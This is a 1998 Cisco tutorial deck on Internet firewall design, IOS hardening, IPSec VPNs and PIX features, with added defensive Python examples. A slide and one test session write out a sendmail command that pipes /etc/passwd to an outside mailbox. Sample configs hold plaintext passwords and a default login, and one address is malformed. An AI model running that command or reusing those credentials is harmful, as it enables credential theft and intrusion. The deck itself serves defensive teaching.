8/13/2019 Cisco - Internet Firewall Technology Tutorial
1/90
10999_03F8_c2
NW98_US_407
Internet Firewall Technology Tutorial
Agenda
Motivation: Threats and Attacks
Motivation: Business Need
Design and Test Principles: Policy, Architecture, Design, Implementation
Cisco Solutions
Motivation: Security Threats and Common Network Attacks
Security Threats
[Figure: four classes of threat]
Impersonation: an attacker claims "I'm Bob, send me all corporate correspondence with Cisco"
Loss of Integrity: a bank customer's deposit of $1000 is altered to $100 on the way
Denial of Service: the target's CPU is exhausted so it can serve no one
Loss of Privacy: a telnet session to foo.bar.org carries the username d-a-n and the password m-y-p-a-s-s-w-o-r-d in the clear, character by character
Exploit Host Weaknesses
[Figure: a host at 10.1.1.1 is compromised through a weakness on the host itself; caption "Good Bye"]
Common Attacks
Routing attacks
Wiretapping
Active content
ICMP attacks
Denial of service attacks
TCP sequence attacks
Send Mail Attacks
Grabbing the /etc/passwd file; injecting a file or running a script
mail from: "|/bin/mail [email protected] < /etc/passwd"
250 "|/bin/mail [email protected] < /etc/passwd"... Sender ok
rcpt to: mickeymouse
550 mickeymouse... User unknown
data
354 Enter mail, end with "." on a line by itself
250 Mail accepted
quit
Password Cracking
Features: graphical brute forcing,
cracking NT passwords, network session
Newer Internet Attacks
Teardrop 1: a fragmentation attack that exploits a reassembly bug with overlapping fragments and causes the targeted system to crash or hang
Teardrop 2: the first fragment starts at offset 0 and the second fragment falls within the TCP header
Land: a SYN packet whose source address and port are the same as the destination address and port
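As an added example, not part of the Cisco slides, here is a small defender-side classifier in Python for the two malformed-packet patterns just described: a Land packet, and Teardrop-style overlapping fragments, including the variant whose second fragment starts inside the TCP header. The Packet record, the FragmentMonitor class, the verdict names and the sample traffic are constructed for this illustration and are not from any Cisco product.

```python
from dataclasses import dataclass
from typing import Dict, List, Tuple

TCP_HEADER_LEN = 20  # minimum TCP header; a fragment starting inside it is never legitimate


@dataclass
class Packet:
    """Constructed record of the IP/TCP fields the checks need (not a real parser)."""
    src_ip: str
    dst_ip: str
    proto: str                  # "tcp" or "udp"
    src_port: int
    dst_port: int
    syn: bool = False
    ip_id: int = 0
    frag_offset: int = 0        # byte offset of this fragment (IP offset field * 8)
    more_fragments: bool = False
    length: int = 0             # octets carried after the IP header


def is_land(pkt: Packet) -> bool:
    """Land: a SYN whose source address and port equal its destination's."""
    return pkt.syn and pkt.src_ip == pkt.dst_ip and pkt.src_port == pkt.dst_port


class FragmentMonitor:
    """Remembers the byte ranges seen per (src, dst, IP id) datagram and reports
    a fragment that overlaps one already seen (Teardrop 1) or that starts inside
    the TCP header (Teardrop 2)."""

    def __init__(self) -> None:
        self.ranges: Dict[Tuple[str, str, int], List[Tuple[int, int]]] = {}

    def check(self, pkt: Packet) -> str:
        if not pkt.more_fragments and pkt.frag_offset == 0:
            return "ok"                       # not a fragment at all
        key = (pkt.src_ip, pkt.dst_ip, pkt.ip_id)
        start, end = pkt.frag_offset, pkt.frag_offset + pkt.length
        verdict = "ok"
        for seen_start, seen_end in self.ranges.get(key, []):
            if start < seen_end and seen_start < end:
                verdict = "overlap"           # Teardrop 1 style overlap
                break
        if verdict == "ok" and pkt.proto == "tcp" and 0 < start < TCP_HEADER_LEN:
            verdict = "header-overlap"        # Teardrop 2 style: lands in the TCP header
        self.ranges.setdefault(key, []).append((start, end))
        return verdict


def classify(pkt: Packet, monitor: FragmentMonitor) -> str:
    """Return 'land', 'overlap', 'header-overlap' or 'ok' for one packet."""
    if is_land(pkt):
        return "land"
    return monitor.check(pkt)


# Construct, to illustrate: one Land packet, one benign fragmented datagram,
# one overlapping pair, and one fragment that starts inside the TCP header.
SAMPLE_TRAFFIC = [
    Packet("192.0.2.10", "192.0.2.10", "tcp", 139, 139, syn=True),
    Packet("198.51.100.1", "192.0.2.20", "udp", 53, 53, ip_id=1, frag_offset=0,
           more_fragments=True, length=1480),
    Packet("198.51.100.1", "192.0.2.20", "udp", 53, 53, ip_id=1, frag_offset=1480, length=100),
    Packet("198.51.100.2", "192.0.2.20", "udp", 53, 53, ip_id=2, frag_offset=0,
           more_fragments=True, length=36),
    Packet("198.51.100.2", "192.0.2.20", "udp", 53, 53, ip_id=2, frag_offset=24, length=20),
    Packet("198.51.100.3", "192.0.2.20", "tcp", 1234, 80, ip_id=3, frag_offset=8, length=40),
]


def run_sample() -> List[str]:
    monitor = FragmentMonitor()
    return [classify(p, monitor) for p in SAMPLE_TRAFFIC]


if __name__ == "__main__":
    for pkt, verdict in zip(SAMPLE_TRAFFIC, run_sample()):
        print(f"{pkt.src_ip}:{pkt.src_port} -> {pkt.dst_ip}:{pkt.dst_port} "
              f"offset={pkt.frag_offset}: {verdict}")
```

A real reassembly engine would also bound the table per source and age entries out; the point here is only that both patterns are decidable from header fields before any reassembly takes place, which is why a filtering router or firewall can drop them in front of the hosts.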
Other Items
SNMP v1 community strings
CERT advisories
X11, RPC, NIS, NFS, NTP, finger
UDP high ports, TCP high ports
Service Configuration
no service finger
no service pad
no service tcp-small-servers
no service udp-small-servers
no ip bootp server
no ip source-route
service password-encryption
enable secret YellowMegaMan
no enable password
! the following three are applied under each interface
no ip redirects
no ip directed-broadcast
no ip proxy-arp
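The following added Python example (not from the Cisco deck) audits a saved IOS configuration against the hardening lines listed above. The statement set, the prefix-matching rule, the sample configuration and the findings format are this example's own assumptions; the three `ip` commands are matched per interface because that is where IOS applies them.

```python
from typing import Dict, List, Tuple

# Hardening statements from the slide, grouped by where IOS configures them.
# Matching is by prefix, so "enable secret 5 ..." satisfies "enable secret".
GLOBAL_REQUIRED = [
    "no service finger",
    "no service pad",
    "no service tcp-small-servers",
    "no service udp-small-servers",
    "no ip bootp server",
    "no ip source-route",
    "service password-encryption",
    "enable secret",
]
GLOBAL_FORBIDDEN = ["enable password"]          # "no enable password" is the goal
INTERFACE_REQUIRED = ["no ip redirect", "no ip directed-broadcast", "no ip proxy-arp"]


def parse_config(text: str) -> Tuple[List[str], Dict[str, List[str]]]:
    """Split a running-config into global lines and per-interface sub-command lists."""
    global_lines: List[str] = []
    interfaces: Dict[str, List[str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line or line.startswith("!"):
            current = None                      # "!" or a blank line ends a block
            continue
        if line.startswith("interface "):
            current = line.split(None, 1)[1]
            interfaces[current] = []
            continue
        if line.startswith(" ") and current is not None:
            interfaces[current].append(line.strip())
            continue
        current = None
        global_lines.append(line.strip())
    return global_lines, interfaces


def _present(lines: List[str], prefix: str) -> bool:
    return any(line.startswith(prefix) for line in lines)


def audit(text: str) -> List[str]:
    """Return one finding per hardening statement that is missing or violated."""
    global_lines, interfaces = parse_config(text)
    findings = []
    for required in GLOBAL_REQUIRED:
        if not _present(global_lines, required):
            findings.append(f"global: missing '{required}'")
    for forbidden in GLOBAL_FORBIDDEN:
        if _present(global_lines, forbidden):
            findings.append(f"global: remove '{forbidden}'")
    for name, lines in interfaces.items():
        for required in INTERFACE_REQUIRED:
            if not _present(lines, required):
                findings.append(f"{name}: missing '{required}'")
    return findings


# Constructed sample configuration with several gaps (not a real device's config).
SAMPLE_CONFIG = """\
service password-encryption
no service finger
no service pad
no service tcp-small-servers
enable secret 5 $1$EXAMPLE$placeholderhash
enable password letmein
no ip source-route
!
interface Ethernet0
 ip address 10.1.1.1 255.255.255.0
 no ip redirects
 no ip directed-broadcast
!
interface Serial0
 ip address 192.0.2.1 255.255.255.252
!
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE_CONFIG):
        print(finding)
```

Running it over the sample reports the two missing global statements, the leftover `enable password`, and the interface-level gaps on both interfaces, which is the kind of check worth running against every router at the perimeter rather than only the one that was hardened by hand.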
Motivation: Business Need
Traditional Business
[Figure: the enterprise at the center, with separate links to employees, partners, customers and suppliers]
The Need to Be Networked
A new model of information technology
Being connected is not enough; electronic commerce is not enough
You need to be networked to all your important constituencies
Open up internal operational systems and information to prospects, customers, partners, suppliers, and employees
The Global Networked Business
[Figure: employees, customers, partners and suppliers all networked directly with the enterprise]
Design: Policy
What Are the Business Problems You Are Trying to Solve?
[Figure: the Internet business need is weighed against security considerations for four scenarios: Internet Access, Internet Presence, Networked Commerce, and VPN and Extranets]
What Are Their Risks?
[Figure: causal diagram relating R, S, T, V and W through the factors below, each link marked + or -]
R: Risk; S: Safeguard; T: Threat; V: Value; W: Weakness
RSF: Risk-Safeguard Factor
RVF: Risk-Value Factor
STF: Safeguard-Threat Factor
SVF: Safeguard-Value Factor
VTF: Value-Threat Factor
WTF: Weakness-Threat Factor
Simplified Causal Diagram
[Figure: Threat, Weakness, Safeguard, Assurance and Value linked to Risk, each link marked + or -]
Threat: hazards facing the information (attacks/time)
Weakness: vulnerability of the processing ($/attack)
Safeguard: methods of protection ($/time)
Value: dollar value of information ($)
Assurance: confidence factor ($/time)
Internet Access
Applications:
Web access and e-mail (using an external mail server)
Streaming audio/video
Security issues:
Protection of internal resources from outsiders
Limiting external privileges of internal users
Visibility of internal network addresses
Auditing usage and possible attacks
Internet Presence
Additional applications:
E-mail server managed locally
Web server
Additional security issues:
Protection of public resources
Separation of public and internal networks
Authentication of remote users
Networked Commerce
Additional applications:
Electronic commerce with controlled access to business systems for ordering, etc.
Additional security issues:
Secure gateway-internal communication
Client-commerce gateway encryption
Strong application authentication of client
[Figure: commerce gateways sit between the Internet and the internal business systems]
VPN and Extranets
Additional applications:
Private connections over public network
Virtual Private Network (VPN)
Additional security issues:
Encryption between remote users/sites and HQ
Very strong network authentication of client
[Figure: HQ connected over the Internet to a remote site, to mobile and home users, and to an extranet partner]
Design: Architecture
What Is a Firewall?
"I think it was Pope Urban that first attempted a definition in 1094. He enforced his definition in 1095-1099. Zangi, the Prince of Mosul refuted it in 1144 and Saladin was left to stave off Pope Eugenius III and St. Bernard between 1146 and 1148. And, as everyone knows, Richard the Lion Hearted debated the definition with Saladin between 1189 and 1192 without a resolution. All of this is to say that this can become a religious issue and many deaths will occur from it."
Chris Lonvick
Security Technology Taxonomy
Identity: accurately identify network users and their privileges
Integrity: network integrity through secure network perimeters, privacy and encryption, and reliable operation
Active Audit: provide auditing, accounting, and active detection and response
Firewall Design Criteria One
Where is your policy? Implement it
Hosts offering public services/access are not secure
Internal network hosts should not offer public services/access
Private networks and hosts should not be visible
Firewall Design Criteria Two
Know your network
Security for multiple Internet access points
Management and operation comfort
Network security cannot replace data security
Detailed security and usage accounting
Firewall Design Criteria Three
A robust firewall is typically not one device
Layered topology; defense in depth
Redundancy and failover
Response plan
Internet Access Firewall Topology
Reasonable features and performance at a low cost
Usually a router with firewall capabilities
[Figure: a single firewall-capable router between the outside and the internal network]
Internet Presence Firewall Topology
Dedicated firewall platforms
Multiple interfaces/layers
Many features, high performance
[Figure: the firewall separates the outside from demilitarized zones (DMZs) holding the public access servers, and from the internal network]
Lock-and-Key
Situation: you want a subset of hosts on a network to access a host on a remote network protected by a firewall
With lock-and-key access, you can enable only a desired set of hosts to gain access by having them authenticate through a TACACS+ server
Lock-and-Key Configuration
aaa new-model
aaa authentication login lockkey tacacs+ enable
access-list 101 dynamic telecommuter timeout 5 permit ip any any
access-list 101 permit tcp any host 10.1.1.1 eq 23
interface e0
 ip address 10.1.1.1 255.255.255.0
 ip access-group 101 in
tacacs-server host 1.1.1.1
tacacs-server key cisco
line vty 0 4
 password telecommuter
 login authentication lockkey
 autocommand access-enable timeout 2
Networked Commerce
Coupled gateway and application servers
Encryption and authentication
[Figure: an encrypted web transaction from the outside terminates at the commerce gateway, which is coupled to the application servers]
VPNs and Extranets
Strong encryption, authentication
Routers, firewalls, end systems
IPSec: Standard for VPN Encryption
Standards compliance: IPSec AH/ESP encapsulated tunnels; IKE key management
Fully interoperable: Cisco IOS, firewalls, and other IPSec-compliant systems
Client support: Windows 95 and Windows NT 4.x (Cisco provided software); Windows NT 5.0 (Microsoft/Cisco partnership)
[Figure: encrypted IP carried across the Internet between the internal network and the remote end]
IPSec Modes
Transport mode: IP HDR | IPsec HDR | Data (the data may be encrypted; the original IP header is kept)
Tunnel mode: New IP HDR | IPsec HDR | IP HDR | Data (the original IP header and the data may be encrypted inside the new outer header)
Virtual Private Network Example
[Figure: two routers, 128.49.48.1 and 128.49.54.1; traffic is in the clear on each side's LAN and encrypted between the two routers]
VPN Configuration
! Define IPsec policy: two transform sets providing encryption and authentication
crypto ipsec transform-set first ah-md5-hmac
 mode tunnel
crypto ipsec transform-set second ah-sha-hmac esp-des
 mode tunnel
!
! Set IKE policy
crypto isakmp policy 5
 auth rsa-encr
 hash md5
 lifetime 3600
!
! Create a crypto map: define the negotiating peer, prioritize the IPsec policy, match an access list
crypto map toBob 10 ipsec-isakmp
 set peer 128.49.54.1
 set transform-set first second
 match address 155
!
! Configure the interface and assign the crypto map
interface e0
 ip address 128.49.48.1 255.255.255.0
 crypto map toBob
!
! Define the access list that selects all traffic to encrypt
access-list 155 permit ip 128.49.48.1 0.0.0.255 128.49.54.1 0.0.0.255
Design: Test
Firewall Test Criteria One
Where is your policy? Who controls routers? Who controls firewalls? Who makes up the security team?
Check policy and well-known holes
Scan the network
Test the firewall and the services behind it
Use verification and IDS tools
Firewall Test Criteria Two
Do things work as expected?
Scan firewall
Scan DMZ and services
Scan internal network
Invert policy rules on sniffer
Log and document everything
Logging
service timestamps debug datetime msec
service timestamps log datetime msec
logging buffered 16384
logging trap debugging
logging 169.222.32.1
logging source-interface loopback0
access-list 101 permit tcp any host 10.1.1.1 eq 23 log
ip ftp source-interface loopback0
ip ftp username c7200
ip ftp password 7 8675309G
exception protocol ftp
exception dump 10.1.1.1
Firewall Test Criteria Three
Testing never ends
Know your network
Review logs
Educate staff and users
Keep revisions up to date
Implementation: Cisco Solutions
Cisco Firewall Product Line
[Figure: products placed by performance and feature set: Cisco 1600/2500 with Cisco IOS Firewall features, Centri Firewall for Windows NT, PIX Firewall]
Supported Applications
Telnet, Web, FTP, and SMTP
RealAudio, RealVideo, and VDOLive
Lotus Notes, IMAP, and LDAP
DNS resolves and zone transfers
RPC, R-Commands
Other generic IP, TCP, and UDP
Java Blocking
[Figure: the inspect port command sits between web client and web server. The client's HTTP request for a Java applet passes; the server reply is inspected: if it carries the Java signature the packet is dropped, if there is no Java signature it is let through]
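As an added example (not Cisco's code), the following Python shows the inspection logic the figure describes: parse an HTTP reply, look for the Java class-file signature at the start of the body, and drop the reply unless the server falls inside a permitted list, which is what the `java-list` reference in the IOS sample configuration later in the deck points at. The function names, the allow-list form and the sample replies are this example's own assumptions.

```python
import ipaddress
from typing import Iterable, List, Tuple

JAVA_CLASS_MAGIC = b"\xca\xfe\xba\xbe"   # first four bytes of every Java class file


def split_http_reply(raw: bytes) -> Tuple[bytes, bytes]:
    """Split a raw HTTP reply into its header block and body."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:                          # tolerate bare-LF servers
        head, sep, body = raw.partition(b"\n\n")
    return head, body


def carries_java_applet(body: bytes) -> bool:
    """The Java signature check: an uncompressed .class file starts with CAFEBABE."""
    return body[:4] == JAVA_CLASS_MAGIC


def inspect_http_reply(server_ip: str, raw: bytes, java_list: Iterable[str]) -> str:
    """Return 'pass' or 'drop'. Replies that carry a Java applet are dropped unless
    the serving host lies inside one of the java_list networks (standard-ACL style)."""
    _head, body = split_http_reply(raw)
    if not carries_java_applet(body):
        return "pass"                                    # no Java signature: let it through
    addr = ipaddress.ip_address(server_ip)
    for entry in java_list:
        if addr in ipaddress.ip_network(entry, strict=False):
            return "pass"                                # applet from a permitted source
    return "drop"


# Constructed replies: an applet from a permitted host, the same applet from an
# untrusted host, and plain HTML. The allow-list mirrors 'access-list 10 permit 172.34.7.130'.
APPLET_REPLY = (b"HTTP/1.0 200 OK\r\nContent-Type: application/octet-stream\r\n\r\n"
                + JAVA_CLASS_MAGIC + b"\x00\x00\x00\x2e" + b"\x00" * 16)
HTML_REPLY = b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n<html><body>hi</body></html>"
JAVA_LIST = ["172.34.7.130/32"]


def run_sample() -> List[str]:
    return [
        inspect_http_reply("172.34.7.130", APPLET_REPLY, JAVA_LIST),
        inspect_http_reply("198.51.100.9", APPLET_REPLY, JAVA_LIST),
        inspect_http_reply("198.51.100.9", HTML_REPLY, JAVA_LIST),
    ]


if __name__ == "__main__":
    print(run_sample())
```

The check sees only class files sent uncompressed; an applet delivered inside an archive does not begin with the magic bytes, so signature blocking at this layer is a coarse control, not a substitute for policy on the clients.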
Attack Detection and Prevention
Events: monitors the following statistics and conditions:
Total embryonic connections
Per-minute incoming new connection rate
Timer for TCP connections to reach established state
Packet count for duplicate SYN packets
Packet sequence numbers
Alerts
Non-statistical events may trigger alerts
Alerts set on groups of events or specific ones: DoS attacks, SMTP command attacks, or denied Java applets
Alerts are visual, e-mail, and pager
Thresholds limit the number of alerts issued when repeating in a given timeframe
E-mail is based on MAPI (install Messaging)
Beeper is based on TAPI
Adaptive Security Algorithm (ASA)
Provides stateful connection policy
Connections allowed out allow return session backflow; incoming connections must be explicitly enabled
Initial TCP sequence number randomized
Tracks source and destination ports + addresses, TCP sequences, and additional TCP flags
Access control list (ACL) policy support
UDP + TCP session state: TCP uses the FIN bit; UDP uses a one-minute default timer (except for DNS)
TCP Connections Inside to Outside: Initialization Phase
Assume data length = 100 octets; checksum is modified, not recalculated
[Figure: the SYN exchange in three steps. The sender 10.0.0.14:4005 sends a SYN to 171.68.10.2:23. The PIX checks whether a translation exists; if not, it creates one after verifying NAT, global, access control and authentication (if any), and a connection entry is also created. The SYN leaves the PIX with source 171.69.236.5:4005. The receiver/responder answers with a SYN-ACK to 171.69.236.5:4005. The PIX follows the adaptive security algorithm: (src IP, src port, dest IP, dest port) check, sequence number check, translation check; the packet is then delivered to 10.0.0.14:4005. If the packet's code bit had not been SYN-ACK, it would have been dropped and logged. Packets spoofed back toward the inside ("back spoofing", "IP spoofing") fail these checks. Fields shown per packet: source IP address, destination IP address, source port, destination port, sequence number, acknowledge, code, checksum, data]
TCP Connections Inside to Outside: Data Transfer
[Figure: data transfer. The sender 10.0.0.14:4005 sends an ACK carrying 132 octets of data to 171.68.10.2:23; since the ACK bit is set, connection and translation entries should already exist. The PIX rewrites the source to 171.69.236.5:4005 and forwards. The receiver/responder replies with an ACK to 171.69.236.5:4005; the ASA checks the packet again against the connection and translation tables before delivering it to 10.0.0.14:4005. Fields shown per packet: source IP address, destination IP address, source port, destination port, sequence number, acknowledge, code, checksum, data]
TCP Connections Inside to Outside: Termination Phase
Assume data length = 100 octets; checksum is modified, not recalculated
[Figure: termination. The sender 10.0.0.14:4005 sends a FIN to 171.68.10.2:23; the PIX forwards it with source 171.69.236.5:4005. The receiver/responder answers with a FIN-ACK to 171.69.236.5:4005, which the PIX translates back to 10.0.0.14:4005. Fields shown per packet: source IP address, destination IP address, source port, destination port, sequence number, acknowledge, code, checksum, data]
PIX will only accept a packet with code bit FIN-ACK
All other packets are dropped
Any packet after this packet would also be dropped
Connection released immediately
Translation released after the xlate timeout
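The three phases above, as an added Python model (not PIX code) of the Adaptive Security Algorithm: an xlate table mapping inside addresses to a global pool, a conn table keyed on the translated 4-tuple, a random offset standing in for initial-sequence-number randomization, and per-state checks so that the outside may only send a SYN-ACK, then in-window ACKs, then a FIN-ACK. The class, the field names, the segment record, the window tolerance and the demo addresses (taken from the figures) are this example's assumptions.

```python
import random
from dataclasses import dataclass, replace
from typing import Dict, List, Optional, Tuple

SYN, ACK, FIN = "SYN", "ACK", "FIN"
MOD = 2 ** 32
WINDOW = 65535       # assumption: how far ahead of the expected sequence number we accept


@dataclass
class Segment:
    """Constructed TCP segment record with only the fields the ASA checks use."""
    src: str
    sport: int
    dst: str
    dport: int
    flags: frozenset
    seq: int
    ack: int
    length: int = 0  # payload octets


class PixASA:
    """Toy model of the PIX Adaptive Security Algorithm: xlate + conn tables,
    randomized initial sequence numbers, and per-state checks on inbound segments."""

    def __init__(self, global_pool: List[str], seed: int = 1) -> None:
        self.pool = list(global_pool)
        self.xlate: Dict[str, str] = {}        # inside address -> global address
        self.inside_of: Dict[str, str] = {}    # global address -> inside address
        self.conns: Dict[Tuple[str, int, str, int], dict] = {}
        self.rng = random.Random(seed)
        self.log: List[str] = []

    def outbound(self, seg: Segment) -> Optional[Segment]:
        """Inside -> outside. A SYN creates the xlate and conn entries (the NAT,
        global and access checks are omitted here); anything else must already match."""
        initiating = SYN in seg.flags and ACK not in seg.flags
        if seg.src not in self.xlate:
            if not initiating:
                return self._drop(seg, "no translation for a non-SYN segment")
            g = self.pool.pop(0)
            self.xlate[seg.src], self.inside_of[g] = g, seg.src
        g = self.xlate[seg.src]
        key = (g, seg.sport, seg.dst, seg.dport)
        conn = self.conns.get(key)
        if conn is None:
            if not initiating:
                return self._drop(seg, "no connection entry")
            delta = self.rng.randrange(1, 2 ** 31)       # ISN randomization offset
            conn = {"state": "SYN_SENT", "delta": delta,
                    "expect_ack": (seg.seq + delta + 1) % MOD, "next_in": None}
            self.conns[key] = conn
        if FIN in seg.flags:
            conn["state"] = "FIN_WAIT"
        return replace(seg, src=g, seq=(seg.seq + conn["delta"]) % MOD)

    def inbound(self, seg: Segment) -> Optional[Segment]:
        """Outside -> inside. Translation check, connection check, then only the
        flags and sequence numbers the current state allows; otherwise drop and log."""
        inside = self.inside_of.get(seg.dst)
        if inside is None:
            return self._drop(seg, "no translation")
        key = (seg.dst, seg.dport, seg.src, seg.sport)
        conn = self.conns.get(key)
        if conn is None:
            return self._drop(seg, "no connection (incoming must be explicitly enabled)")
        state = conn["state"]
        if state == "SYN_SENT":
            if seg.flags != frozenset({SYN, ACK}) or seg.ack != conn["expect_ack"]:
                return self._drop(seg, "expected SYN-ACK acknowledging our ISN")
            conn["state"], conn["next_in"] = "ESTABLISHED", (seg.seq + 1) % MOD
        elif state == "ESTABLISHED":
            if ACK not in seg.flags or (seg.seq - conn["next_in"]) % MOD >= WINDOW:
                return self._drop(seg, "flag or sequence number check failed")
            conn["next_in"] = (seg.seq + seg.length) % MOD
        else:  # FIN_WAIT: only FIN-ACK is accepted, and it releases the connection
            if seg.flags != frozenset({FIN, ACK}):
                return self._drop(seg, "only FIN-ACK accepted after FIN")
            del self.conns[key]            # the xlate stays until its own timeout
        return replace(seg, dst=inside, ack=(seg.ack - conn["delta"]) % MOD)

    def _drop(self, seg: Segment, why: str) -> None:
        self.log.append(f"drop {seg.src}:{seg.sport}->{seg.dst}:{seg.dport}: {why}")
        return None


if __name__ == "__main__":
    pix = PixASA(["171.69.236.5"])
    out = pix.outbound(Segment("10.0.0.14", 4005, "171.68.10.2", 23, frozenset({SYN}), 1000, 0))
    print("SYN leaves as", out.src, "seq", out.seq)
    back = pix.inbound(Segment("171.68.10.2", 23, "171.69.236.5", 4005,
                               frozenset({SYN, ACK}), 5000, (out.seq + 1) % MOD))
    print("SYN-ACK delivered to", back.dst, "ack", back.ack)
    pix.inbound(Segment("198.51.100.7", 4444, "171.69.236.5", 4005, frozenset({SYN}), 1, 0))
    print(pix.log)
```

The drop log is where the value is for operations: every entry is a packet that reached a global address without a matching outbound conversation, or with the wrong flags for the state, which is exactly the "dropped and logged" case in the figure.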
Static vs. Conduit
Static:
A static maps a global (outside) address to an inside (local) address. Any access to the global goes to the mapped inside address. This gives an inside machine with an illegal address a presence on the outside with a legal address. A static is secure (protected).
Conduit:
A conduit is a hole through the firewall allowing outside machines to initiate connections to inside machines. It is related to a static in that a static maps a global address to a local machine. Conduits are only as secure as you make them. They are used for service items.
Authorization
[Figure: Joe, on the Internet, telnets through the PIX Firewall toward Inside Host A on the intranet (DNS/mail sit in the DMZ). The PIX consults Cisco Secure for Joe's user profile: id=Joe, Fail=0, Service=Shell, Cmd=Telnet {Permit Host A}, Cmd=FTP {Permit Host B}]
SYN Flood Defender
Throttles both internal and external maximum sessions
Inbound: controls SYN flooding (denial of service)
Outbound: limits maximum sessions (controls applications such as Microsoft's Internet Explorer)
Protects session resources from being depleted
Maintains high network reliability
SYN Floods Trying to Kill Mail Server
[Figure: SYNs arrive from the Internet toward the inside SMTP mail server; with the PIX limit set to 2, the first two are allowed and the third is stopped]
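As an added Python example (not PIX code), here is a per-server embryonic-connection limiter in the spirit of the figure above, keeping the statistics listed under Attack Detection and Prevention: total embryonic connections, new-connection rate per minute, time for a connection to reach the established state, and the duplicate-SYN count. The class, its thresholds, the key layout and the sample sequence of SYNs are this example's assumptions.

```python
from collections import deque
from typing import Deque, Dict, List, Tuple

ConnKey = Tuple[str, int, str, int]   # (client ip, client port, server ip, server port)


class SynFloodDefender:
    """Limits half-open (embryonic) connections per server and keeps the counters a
    firewall would raise alerts on. Times are seconds as plain floats."""

    def __init__(self, embryonic_limit: int, embryonic_timeout: float = 30.0,
                 rate_alert_per_min: int = 100) -> None:
        self.embryonic_limit = embryonic_limit
        self.embryonic_timeout = embryonic_timeout
        self.rate_alert_per_min = rate_alert_per_min
        self.embryonic: Dict[ConnKey, float] = {}     # half-open conn -> time SYN seen
        self.established: Dict[ConnKey, float] = {}   # completed conn -> seconds to establish
        self.new_conn_times: Deque[float] = deque()   # accepted SYNs in the last minute
        self.dup_syns = 0
        self.stopped = 0
        self.alerts: List[str] = []

    def _half_open_toward(self, server: Tuple[str, int]) -> int:
        return sum(1 for (_, _, ip, port) in self.embryonic if (ip, port) == server)

    def on_syn(self, key: ConnKey, now: float) -> str:
        """Returns 'allowed', 'stopped' (server over its limit) or 'duplicate'."""
        self.expire(now)
        if key in self.embryonic:
            self.dup_syns += 1            # retransmitted SYN: count it, no second slot
            return "duplicate"
        server = (key[2], key[3])
        if self._half_open_toward(server) >= self.embryonic_limit:
            self.stopped += 1
            return "stopped"
        self.embryonic[key] = now
        self.new_conn_times.append(now)
        if len(self.new_conn_times) > self.rate_alert_per_min:
            self.alerts.append(f"{now:.1f}: new-connection rate exceeded toward {server[0]}:{server[1]}")
        return "allowed"

    def on_established(self, key: ConnKey, now: float) -> bool:
        """The client's final ACK arrived: free the embryonic slot, record setup time."""
        t_syn = self.embryonic.pop(key, None)
        if t_syn is None:
            return False
        self.established[key] = now - t_syn
        return True

    def expire(self, now: float) -> None:
        """Drop half-open entries that never completed, and age the rate window."""
        for key, t_syn in list(self.embryonic.items()):
            if now - t_syn > self.embryonic_timeout:
                del self.embryonic[key]
        while self.new_conn_times and now - self.new_conn_times[0] > 60.0:
            self.new_conn_times.popleft()

    def stats(self, now: float) -> Dict[str, int]:
        self.expire(now)
        return {"embryonic": len(self.embryonic), "rate_per_min": len(self.new_conn_times),
                "dup_syns": self.dup_syns, "stopped": self.stopped,
                "established": len(self.established)}


if __name__ == "__main__":
    # Constructed: three clients hit the mail server 192.0.2.25:25 under a limit of 2.
    d = SynFloodDefender(embryonic_limit=2)
    server = ("192.0.2.25", 25)
    for i, t in enumerate([0.0, 0.5, 1.0]):
        print(d.on_syn(("203.0.113.%d" % (i + 1), 40000 + i) + server, t))
    print(d.stats(1.0))
```

The embryonic limit is the same knob the PIX `static` command exposes as its last argument in the three-interface configuration later in the deck; the limit must be sized to the server's real backlog, because too low a value lets a small flood deny service to legitimate clients exactly as the figure shows for the third SYN.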
Content Filter Trying to
[Figure: an outside SMTP client sends Debug, NOOP and Get INFO toward the inside mail server; only the allowed commands pass (NOOP is answered OK), the rest are filtered]
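The Send Mail Attacks session earlier in the deck and the content filter figure above come down to the same control: a mail-side filter that admits a minimal SMTP command set and refuses envelope addresses that are really shell commands. This added Python example (not PIX Mail Guard code) implements such a filter; the command set, the address grammar, the reply strings and the sample session are this example's assumptions.

```python
import re
from typing import List, Optional, Tuple

# Minimal command set the filter admits (assumption for this example).
ALLOWED_COMMANDS = {"HELO", "MAIL", "RCPT", "DATA", "RSET", "NOOP", "QUIT"}

# A plain mailbox: local part, optional @domain, optional angle brackets, or the
# empty reverse path "<>". Pipes, quotes, redirects and spaces never match.
_ADDRESS = re.compile(r"^(?:<>|<?[A-Za-z0-9._%+-]+(?:@[A-Za-z0-9.-]+)?>?)$")
_ENVELOPE = re.compile(r"^(from|to)\s*:\s*(.*)$", re.IGNORECASE)


def check_command(line: str) -> Optional[str]:
    """Return an SMTP error reply if the line must be refused, else None (forward it)."""
    verb, _, rest = line.strip().partition(" ")
    verb = verb.upper()
    if verb not in ALLOWED_COMMANDS:
        return "500 command unrecognized"
    if verb in ("MAIL", "RCPT"):
        m = _ENVELOPE.match(rest.strip())
        if m is None or not _ADDRESS.match(m.group(2).strip()):
            return "501 syntax error in address"
    return None


def filter_session(lines: List[str]) -> List[Tuple[str, str]]:
    """Run a client's command lines through the filter; 'forward' means the real
    mail server sees the line, anything else is the filter's own reply."""
    return [(line, check_command(line) or "forward") for line in lines]


# Constructed client session: the pipe-in-sender trick from the sendmail attack
# slide (with a placeholder address), then the probes from the content-filter figure.
SAMPLE_SESSION = [
    "HELO client.example.test",
    'mail from: "|/bin/mail attacker@example.test < /etc/passwd"',
    "MAIL FROM:<alice@example.test>",
    "rcpt to: mickeymouse",
    "DEBUG",
    "NOOP",
    "Get INFO",
    "EXPN root",
    "QUIT",
]

if __name__ == "__main__":
    for line, verdict in filter_session(SAMPLE_SESSION):
        print(f"{verdict:35} {line}")
```

Whitelisting the verb set, rather than blacklisting known-bad ones, is what makes this kind of filter hold up against commands the filter's author never heard of; the address grammar does the same job for the envelope, which is where the sendmail pipe trick lived.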
Client VPN: PIX / Ravlin IPSec
Standards compliance: IPSec AH/ESP encapsulated tunnel; IKE key management
Wire-speed performance: Ethernet now, Fast Ethernet late CY 98
Fully interoperable: Cisco IOS and other IPSec-compliant systems
[Figure: encrypted IP across the Internet between the internal network and the client]
PIX with OTP Configuration
Configuration on the PIX manager: go to the PIX manager URL 10.0.0.0.100:8080, username = pixadmin, password = cisco
